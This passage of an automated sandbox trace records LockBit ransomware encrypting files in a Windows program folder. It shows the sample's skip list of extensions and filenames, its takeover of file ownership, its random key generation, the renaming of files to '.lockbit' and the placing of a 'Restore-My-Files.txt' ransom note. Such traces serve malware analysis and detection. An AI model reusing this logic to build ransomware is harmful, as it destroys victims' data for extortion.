[0084.822] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.822] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.822] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.822] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.823] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.823] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.823] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.823] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.823] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.823] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.823] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.823] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.823] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_notes-txt-background.png") returned 1 [0084.823] lstrcmpiW (lpString1="ntldr", lpString2="Pets_notes-txt-background.png") returned -1 [0084.823] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_notes-txt-background.png") returned -1 [0084.823] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_notes-txt-background.png") returned -1 [0084.823] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_notes-txt-background.png") returned -1 [0084.823] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_notes-txt-background.png") returned 1 [0084.823] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_notes-txt-background.png") returned -1 [0084.823] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.823] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png") returned=".png" [0084.824] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.824] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.824] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.824] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.824] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.824] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.824] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.825] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.825] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.825] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.825] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.825] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png.lockbit") returned 87 [0084.825] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_notes-txt-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.825] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.826] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.826] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.826] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.827] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.827] RtlFreeAnsiString (AnsiString="\\") [0084.827] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.827] malloc (_Size=0x200) returned 0x77d800 [0084.827] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.827] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.827] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.827] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.828] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.828] CloseHandle (hObject=0x3b4) returned 1 [0084.828] free (_Block=0x77d800) [0084.828] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_notes-txt-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.828] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.828] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.828] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=7888) returned 1 [0084.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.830] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0084.844] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.844] malloc (_Size=0xc4) returned 0x1ff1e60 [0084.844] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0084.844] free (_Block=0x1ff1e60) [0084.844] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.844] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.845] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.845] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fdde60, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71fdde60, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x41ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="rollinghills.png", cAlternateFileName="")) returned 1 [0084.845] lstrcmpiW (lpString1=".", lpString2="rollinghills.png") returned -1 [0084.845] lstrcmpiW (lpString1="..", lpString2="rollinghills.png") returned -1 [0084.845] PathFindExtensionW (pszPath="rollinghills.png") returned=".png" [0084.845] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.845] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.845] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.846] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.846] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.846] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.846] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.846] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.846] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.846] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.846] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.846] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.847] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.847] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rollinghills.png") returned -1 [0084.847] lstrcmpiW (lpString1="ntldr", lpString2="rollinghills.png") returned -1 [0084.847] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rollinghills.png") returned -1 [0084.847] lstrcmpiW (lpString1="bootsect.bak", lpString2="rollinghills.png") returned -1 [0084.847] lstrcmpiW (lpString1="autorun.inf", lpString2="rollinghills.png") returned -1 [0084.847] lstrcmpiW (lpString1="thumbs.db", lpString2="rollinghills.png") returned 1 [0084.847] lstrcmpiW (lpString1="iconcache.db", lpString2="rollinghills.png") returned -1 [0084.847] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.847] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png") returned=".png" [0084.847] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.847] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.847] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.847] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.848] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.848] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.848] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.848] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.848] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.848] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.848] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.848] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.848] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png.lockbit") returned 74 [0084.848] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\rollinghills.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.849] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.849] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.849] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.850] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.850] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.850] RtlFreeAnsiString (AnsiString="\\") [0084.850] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.850] malloc (_Size=0x200) returned 0x77d800 [0084.850] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.850] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.850] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.850] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.851] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.851] CloseHandle (hObject=0x3b4) returned 1 [0084.851] free (_Block=0x77d800) [0084.851] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\rollinghills.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.851] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.851] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.852] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=16842) returned 1 [0084.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.853] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.853] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0084.864] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.864] malloc (_Size=0xaa) returned 0x1ff1e60 [0084.864] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xaa, FileInformationClass=0xa) returned 0xc0000008 [0084.865] free (_Block=0x1ff1e60) [0084.865] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.865] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.865] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.865] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7215ac02, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7215ac02, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea6e945, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3dd2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Scenes_INTRO_BG.wmv", cAlternateFileName="")) returned 1 [0084.865] lstrcmpiW (lpString1=".", lpString2="Scenes_INTRO_BG.wmv") returned -1 [0084.865] lstrcmpiW (lpString1="..", lpString2="Scenes_INTRO_BG.wmv") returned -1 [0084.865] PathFindExtensionW (pszPath="Scenes_INTRO_BG.wmv") returned=".wmv" [0084.865] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0084.865] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0084.865] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0084.865] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0084.865] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0084.865] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0084.865] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0084.865] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0084.865] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0084.865] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0084.866] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0084.866] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0084.867] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Scenes_INTRO_BG.wmv") returned -1 [0084.867] lstrcmpiW (lpString1="ntldr", lpString2="Scenes_INTRO_BG.wmv") returned -1 [0084.867] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Scenes_INTRO_BG.wmv") returned -1 [0084.868] lstrcmpiW (lpString1="bootsect.bak", lpString2="Scenes_INTRO_BG.wmv") returned -1 [0084.868] lstrcmpiW (lpString1="autorun.inf", lpString2="Scenes_INTRO_BG.wmv") returned -1 [0084.868] lstrcmpiW (lpString1="thumbs.db", lpString2="Scenes_INTRO_BG.wmv") returned 1 [0084.868] lstrcmpiW 